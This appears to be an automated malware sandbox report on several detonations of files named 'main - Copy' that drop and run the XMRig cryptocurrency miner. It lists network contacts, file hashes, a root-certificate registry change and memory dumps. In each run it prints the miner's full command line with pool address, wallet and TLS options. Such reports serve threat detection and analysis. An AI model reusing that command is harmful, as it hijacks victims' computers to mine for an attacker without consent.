memory/3840-55-0x00007FF62B6B0000-0x00007FF62C1B3000-memory.dmp
memory/3840-56-0x00007FF62B6B0000-0x00007FF62C1B3000-memory.dmp
memory/3840-57-0x00007FF62B6B0000-0x00007FF62C1B3000-memory.dmp
memory/3840-58-0x00007FF62B6B0000-0x00007FF62C1B3000-memory.dmp
memory/3840-59-0x00007FF62B6B0000-0x00007FF62C1B3000-memory.dmp
memory/3840-60-0x00007FF62B6B0000-0x00007FF62C1B3000-memory.dmp
memory/3840-61-0x00007FF62B6B0000-0x00007FF62C1B3000-memory.dmp
memory/3840-62-0x00007FF62B6B0000-0x00007FF62C1B3000-memory.dmp
memory/3840-63-0x00007FF62B6B0000-0x00007FF62C1B3000-memory.dmp
memory/3840-64-0x00007FF62B6B0000-0x00007FF62C1B3000-memory.dmp
memory/3840-65-0x00007FF62B6B0000-0x00007FF62C1B3000-memory.dmp
memory/3840-66-0x00007FF62B6B0000-0x00007FF62C1B3000-memory.dmp
memory/3840-67-0x00007FF62B6B0000-0x00007FF62C1B3000-memory.dmp
memory/3840-68-0x00007FF62B6B0000-0x00007FF62C1B3000-memory.dmp
memory/3840-69-0x00007FF62B6B0000-0x00007FF62C1B3000-memory.dmp
memory/3840-70-0x00007FF62B6B0000-0x00007FF62C1B3000-memory.dmp
memory/3840-71-0x00007FF62B6B0000-0x00007FF62C1B3000-memory.dmp
memory/3840-72-0x00007FF62B6B0000-0x00007FF62C1B3000-memory.dmp
memory/3840-73-0x00007FF62B6B0000-0x00007FF62C1B3000-memory.dmp
memory/3840-74-0x00007FF62B6B0000-0x00007FF62C1B3000-memory.dmp
memory/3840-75-0x00007FF62B6B0000-0x00007FF62C1B3000-memory.dmp
memory/3840-76-0x00007FF62B6B0000-0x00007FF62C1B3000-memory.dmp
memory/3840-77-0x00007FF62B6B0000-0x00007FF62C1B3000-memory.dmp
memory/3840-78-0x00007FF62B6B0000-0x00007FF62C1B3000-memory.dmp
memory/3840-79-0x00007FF62B6B0000-0x00007FF62C1B3000-memory.dmp
memory/3840-80-0x00007FF62B6B0000-0x00007FF62C1B3000-memory.dmp
memory/3840-81-0x00007FF62B6B0000-0x00007FF62C1B3000-memory.dmp
memory/3840-82-0x00007FF62B6B0000-0x00007FF62C1B3000-memory.dmp
memory/3840-83-0x00007FF62B6B0000-0x00007FF62C1B3000-memory.dmp
memory/3840-84-0x00007FF62B6B0000-0x00007FF62C1B3000-memory.dmp
Analysis: behavioral3
Detonation Overview
Submitted
2024-05-22 18:52
Reported
2024-05-22 19:41
Platform
win10v2004-20240508-en
Max time kernel
1793s
Max time network
1800s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
xmrig
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2232 wrote to memory of 1180 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (2).exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
| PID 2232 wrote to memory of 1180 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (2).exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\main - Copy (2).exe
"C:\Users\Admin\AppData\Local\Temp\main - Copy (2).exe"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --field-trial-handle=3768,i,14486271492189381216,15799931579469722648,262144 --variations-seed-version --mojo-platform-channel-handle=4356 /prefetch:8
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --field-trial-handle=4716,i,14486271492189381216,15799931579469722648,262144 --variations-seed-version --mojo-platform-channel-handle=3760 /prefetch:8
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 196.249.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 50.28.101.95.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 14.160.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.237:443 | g.bing.com | tcp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| NL | 23.62.61.194:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 237.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | pool.hashvault.pro | udp |
| DE | 95.179.241.203:80 | pool.hashvault.pro | tcp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 55.36.223.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 194.61.62.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 203.241.179.95.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.150.49.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 209.205.72.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 50.23.12.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 56.126.166.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 22.236.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 235.197.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 4.173.189.20.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
| MD5 | e2fe87cc2c7dab8ca6516620dccd1381 |
| SHA1 | f714ec0448325435103519452610cf7aadf8bbba |
| SHA256 | d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4 |
| SHA512 | 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6 |
memory/1180-16-0x000001E328A20000-0x000001E328A40000-memory.dmp
memory/1180-17-0x000001E328A50000-0x000001E328A70000-memory.dmp
memory/1180-18-0x00007FF722840000-0x00007FF723343000-memory.dmp
memory/1180-19-0x000001E328A70000-0x000001E328A90000-memory.dmp
memory/1180-20-0x000001E328A90000-0x000001E328AB0000-memory.dmp
memory/1180-21-0x00007FF722840000-0x00007FF723343000-memory.dmp
memory/1180-22-0x00007FF722840000-0x00007FF723343000-memory.dmp
memory/1180-23-0x00007FF722840000-0x00007FF723343000-memory.dmp
memory/1180-24-0x000001E328A70000-0x000001E328A90000-memory.dmp
memory/1180-25-0x000001E328A90000-0x000001E328AB0000-memory.dmp
memory/1180-26-0x00007FF722840000-0x00007FF723343000-memory.dmp
memory/1180-27-0x00007FF722840000-0x00007FF723343000-memory.dmp
memory/1180-28-0x00007FF722840000-0x00007FF723343000-memory.dmp
memory/1180-29-0x00007FF722840000-0x00007FF723343000-memory.dmp
memory/1180-30-0x00007FF722840000-0x00007FF723343000-memory.dmp
memory/1180-31-0x00007FF722840000-0x00007FF723343000-memory.dmp
memory/1180-32-0x00007FF722840000-0x00007FF723343000-memory.dmp
memory/1180-33-0x00007FF722840000-0x00007FF723343000-memory.dmp
memory/1180-34-0x00007FF722840000-0x00007FF723343000-memory.dmp
memory/1180-35-0x00007FF722840000-0x00007FF723343000-memory.dmp
memory/1180-36-0x00007FF722840000-0x00007FF723343000-memory.dmp
memory/1180-37-0x00007FF722840000-0x00007FF723343000-memory.dmp
memory/1180-38-0x00007FF722840000-0x00007FF723343000-memory.dmp
memory/1180-39-0x00007FF722840000-0x00007FF723343000-memory.dmp
memory/1180-40-0x00007FF722840000-0x00007FF723343000-memory.dmp
memory/1180-41-0x00007FF722840000-0x00007FF723343000-memory.dmp
memory/1180-42-0x00007FF722840000-0x00007FF723343000-memory.dmp
memory/1180-43-0x00007FF722840000-0x00007FF723343000-memory.dmp
memory/1180-44-0x00007FF722840000-0x00007FF723343000-memory.dmp
memory/1180-45-0x00007FF722840000-0x00007FF723343000-memory.dmp
memory/1180-46-0x00007FF722840000-0x00007FF723343000-memory.dmp
memory/1180-47-0x00007FF722840000-0x00007FF723343000-memory.dmp
memory/1180-48-0x00007FF722840000-0x00007FF723343000-memory.dmp
memory/1180-49-0x00007FF722840000-0x00007FF723343000-memory.dmp
memory/1180-50-0x00007FF722840000-0x00007FF723343000-memory.dmp
memory/1180-51-0x00007FF722840000-0x00007FF723343000-memory.dmp
memory/1180-52-0x00007FF722840000-0x00007FF723343000-memory.dmp
memory/1180-53-0x00007FF722840000-0x00007FF723343000-memory.dmp
memory/1180-54-0x00007FF722840000-0x00007FF723343000-memory.dmp
memory/1180-55-0x00007FF722840000-0x00007FF723343000-memory.dmp
memory/1180-56-0x00007FF722840000-0x00007FF723343000-memory.dmp
memory/1180-57-0x00007FF722840000-0x00007FF723343000-memory.dmp
memory/1180-58-0x00007FF722840000-0x00007FF723343000-memory.dmp
memory/1180-59-0x00007FF722840000-0x00007FF723343000-memory.dmp
memory/1180-60-0x00007FF722840000-0x00007FF723343000-memory.dmp
memory/1180-61-0x00007FF722840000-0x00007FF723343000-memory.dmp
memory/1180-62-0x00007FF722840000-0x00007FF723343000-memory.dmp
memory/1180-63-0x00007FF722840000-0x00007FF723343000-memory.dmp
memory/1180-64-0x00007FF722840000-0x00007FF723343000-memory.dmp
memory/1180-65-0x00007FF722840000-0x00007FF723343000-memory.dmp
memory/1180-66-0x00007FF722840000-0x00007FF723343000-memory.dmp
memory/1180-67-0x00007FF722840000-0x00007FF723343000-memory.dmp
memory/1180-68-0x00007FF722840000-0x00007FF723343000-memory.dmp
memory/1180-69-0x00007FF722840000-0x00007FF723343000-memory.dmp
memory/1180-70-0x00007FF722840000-0x00007FF723343000-memory.dmp
memory/1180-71-0x00007FF722840000-0x00007FF723343000-memory.dmp
memory/1180-72-0x00007FF722840000-0x00007FF723343000-memory.dmp
memory/1180-73-0x00007FF722840000-0x00007FF723343000-memory.dmp
memory/1180-74-0x00007FF722840000-0x00007FF723343000-memory.dmp
memory/1180-75-0x00007FF722840000-0x00007FF723343000-memory.dmp
memory/1180-76-0x00007FF722840000-0x00007FF723343000-memory.dmp
memory/1180-77-0x00007FF722840000-0x00007FF723343000-memory.dmp
memory/1180-78-0x00007FF722840000-0x00007FF723343000-memory.dmp
memory/1180-79-0x00007FF722840000-0x00007FF723343000-memory.dmp
memory/1180-80-0x00007FF722840000-0x00007FF723343000-memory.dmp
memory/1180-81-0x00007FF722840000-0x00007FF723343000-memory.dmp
memory/1180-82-0x00007FF722840000-0x00007FF723343000-memory.dmp
memory/1180-83-0x00007FF722840000-0x00007FF723343000-memory.dmp
memory/1180-84-0x00007FF722840000-0x00007FF723343000-memory.dmp
Analysis: behavioral4
Detonation Overview
Submitted
2024-05-22 18:52
Reported
2024-05-22 19:42
Platform
win10v2004-20240508-en
Max time kernel
1792s
Max time network
1800s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
xmrig
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 4080 wrote to memory of 1620 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (3) - Copy.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
| PID 4080 wrote to memory of 1620 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (3) - Copy.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\main - Copy (3) - Copy.exe
"C:\Users\Admin\AppData\Local\Temp\main - Copy (3) - Copy.exe"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --field-trial-handle=4076,i,1809100026287847100,9768898026582633513,262144 --variations-seed-version --mojo-platform-channel-handle=1276 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --field-trial-handle=1388,i,1809100026287847100,9768898026582633513,262144 --variations-seed-version --mojo-platform-channel-handle=4888 /prefetch:8
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 241.150.49.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 0.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| NL | 23.62.61.194:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 194.61.62.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 55.36.223.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | pool.hashvault.pro | udp |
| DE | 45.76.89.70:80 | pool.hashvault.pro | tcp |
| US | 8.8.8.8:53 | 70.89.76.45.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 13.86.106.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 196.249.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 50.23.12.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 198.187.3.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 4.173.189.20.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
| MD5 | e2fe87cc2c7dab8ca6516620dccd1381 |
| SHA1 | f714ec0448325435103519452610cf7aadf8bbba |
| SHA256 | d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4 |
| SHA512 | 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6 |
memory/1620-16-0x0000013B31940000-0x0000013B31960000-memory.dmp
memory/1620-17-0x0000013B31B90000-0x0000013B31BB0000-memory.dmp
memory/1620-18-0x00007FF6355C0000-0x00007FF6360C3000-memory.dmp
memory/1620-19-0x0000013B31BB0000-0x0000013B31BD0000-memory.dmp
memory/1620-20-0x0000013B31BE0000-0x0000013B31C00000-memory.dmp
memory/1620-21-0x00007FF6355C0000-0x00007FF6360C3000-memory.dmp
memory/1620-22-0x00007FF6355C0000-0x00007FF6360C3000-memory.dmp
memory/1620-25-0x0000013B31BE0000-0x0000013B31C00000-memory.dmp
memory/1620-24-0x0000013B31BB0000-0x0000013B31BD0000-memory.dmp
memory/1620-23-0x00007FF6355C0000-0x00007FF6360C3000-memory.dmp
memory/1620-26-0x00007FF6355C0000-0x00007FF6360C3000-memory.dmp
memory/1620-27-0x00007FF6355C0000-0x00007FF6360C3000-memory.dmp
memory/1620-28-0x00007FF6355C0000-0x00007FF6360C3000-memory.dmp
memory/1620-29-0x00007FF6355C0000-0x00007FF6360C3000-memory.dmp
memory/1620-30-0x00007FF6355C0000-0x00007FF6360C3000-memory.dmp
memory/1620-31-0x00007FF6355C0000-0x00007FF6360C3000-memory.dmp
memory/1620-32-0x00007FF6355C0000-0x00007FF6360C3000-memory.dmp
memory/1620-33-0x00007FF6355C0000-0x00007FF6360C3000-memory.dmp
memory/1620-34-0x00007FF6355C0000-0x00007FF6360C3000-memory.dmp
memory/1620-35-0x00007FF6355C0000-0x00007FF6360C3000-memory.dmp
memory/1620-36-0x00007FF6355C0000-0x00007FF6360C3000-memory.dmp
memory/1620-37-0x00007FF6355C0000-0x00007FF6360C3000-memory.dmp
memory/1620-38-0x00007FF6355C0000-0x00007FF6360C3000-memory.dmp
memory/1620-39-0x00007FF6355C0000-0x00007FF6360C3000-memory.dmp
memory/1620-40-0x00007FF6355C0000-0x00007FF6360C3000-memory.dmp
memory/1620-41-0x00007FF6355C0000-0x00007FF6360C3000-memory.dmp
memory/1620-42-0x00007FF6355C0000-0x00007FF6360C3000-memory.dmp
memory/1620-43-0x00007FF6355C0000-0x00007FF6360C3000-memory.dmp
memory/1620-44-0x00007FF6355C0000-0x00007FF6360C3000-memory.dmp
memory/1620-45-0x00007FF6355C0000-0x00007FF6360C3000-memory.dmp
memory/1620-46-0x00007FF6355C0000-0x00007FF6360C3000-memory.dmp
memory/1620-47-0x00007FF6355C0000-0x00007FF6360C3000-memory.dmp
memory/1620-48-0x00007FF6355C0000-0x00007FF6360C3000-memory.dmp
memory/1620-49-0x00007FF6355C0000-0x00007FF6360C3000-memory.dmp
memory/1620-50-0x00007FF6355C0000-0x00007FF6360C3000-memory.dmp
memory/1620-51-0x00007FF6355C0000-0x00007FF6360C3000-memory.dmp
memory/1620-52-0x00007FF6355C0000-0x00007FF6360C3000-memory.dmp
memory/1620-53-0x00007FF6355C0000-0x00007FF6360C3000-memory.dmp
memory/1620-54-0x00007FF6355C0000-0x00007FF6360C3000-memory.dmp
memory/1620-55-0x00007FF6355C0000-0x00007FF6360C3000-memory.dmp
memory/1620-56-0x00007FF6355C0000-0x00007FF6360C3000-memory.dmp
memory/1620-57-0x00007FF6355C0000-0x00007FF6360C3000-memory.dmp
memory/1620-58-0x00007FF6355C0000-0x00007FF6360C3000-memory.dmp
memory/1620-59-0x00007FF6355C0000-0x00007FF6360C3000-memory.dmp
memory/1620-60-0x00007FF6355C0000-0x00007FF6360C3000-memory.dmp
memory/1620-61-0x00007FF6355C0000-0x00007FF6360C3000-memory.dmp
memory/1620-62-0x00007FF6355C0000-0x00007FF6360C3000-memory.dmp
memory/1620-63-0x00007FF6355C0000-0x00007FF6360C3000-memory.dmp
memory/1620-64-0x00007FF6355C0000-0x00007FF6360C3000-memory.dmp
memory/1620-65-0x00007FF6355C0000-0x00007FF6360C3000-memory.dmp
memory/1620-66-0x00007FF6355C0000-0x00007FF6360C3000-memory.dmp
memory/1620-67-0x00007FF6355C0000-0x00007FF6360C3000-memory.dmp
memory/1620-68-0x00007FF6355C0000-0x00007FF6360C3000-memory.dmp
memory/1620-69-0x00007FF6355C0000-0x00007FF6360C3000-memory.dmp
memory/1620-70-0x00007FF6355C0000-0x00007FF6360C3000-memory.dmp
memory/1620-71-0x00007FF6355C0000-0x00007FF6360C3000-memory.dmp
memory/1620-72-0x00007FF6355C0000-0x00007FF6360C3000-memory.dmp
memory/1620-73-0x00007FF6355C0000-0x00007FF6360C3000-memory.dmp
memory/1620-74-0x00007FF6355C0000-0x00007FF6360C3000-memory.dmp
memory/1620-75-0x00007FF6355C0000-0x00007FF6360C3000-memory.dmp
memory/1620-76-0x00007FF6355C0000-0x00007FF6360C3000-memory.dmp
memory/1620-77-0x00007FF6355C0000-0x00007FF6360C3000-memory.dmp
memory/1620-78-0x00007FF6355C0000-0x00007FF6360C3000-memory.dmp
memory/1620-79-0x00007FF6355C0000-0x00007FF6360C3000-memory.dmp
memory/1620-80-0x00007FF6355C0000-0x00007FF6360C3000-memory.dmp
memory/1620-81-0x00007FF6355C0000-0x00007FF6360C3000-memory.dmp
memory/1620-82-0x00007FF6355C0000-0x00007FF6360C3000-memory.dmp
memory/1620-83-0x00007FF6355C0000-0x00007FF6360C3000-memory.dmp
memory/1620-84-0x00007FF6355C0000-0x00007FF6360C3000-memory.dmp
Analysis: behavioral11
Detonation Overview
Submitted
2024-05-22 18:52
Reported
2024-05-22 20:03
Platform
win10v2004-20240508-en
Max time kernel
1796s
Max time network
1791s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
xmrig
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 | C:\Users\Admin\AppData\Local\Temp\main - Copy (6).exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e | C:\Users\Admin\AppData\Local\Temp\main - Copy (6).exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 4964 wrote to memory of 3056 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (6).exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
| PID 4964 wrote to memory of 3056 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (6).exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\main - Copy (6).exe
"C:\Users\Admin\AppData\Local\Temp\main - Copy (6).exe"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 133.211.185.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 67.31.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.110.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.237:443 | g.bing.com | tcp |
| NL | 23.62.61.97:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.110.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 237.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 97.61.62.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 88.156.103.20.in-addr.arpa | udp |
| NL | 23.62.61.97:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | pool.hashvault.pro | udp |
| DE | 95.179.241.203:80 | pool.hashvault.pro | tcp |
| US | 8.8.8.8:53 | 203.241.179.95.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 209.205.72.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 154.239.44.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 157.123.68.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.31.95.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 19.229.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 0.205.248.87.in-addr.arpa | udp |
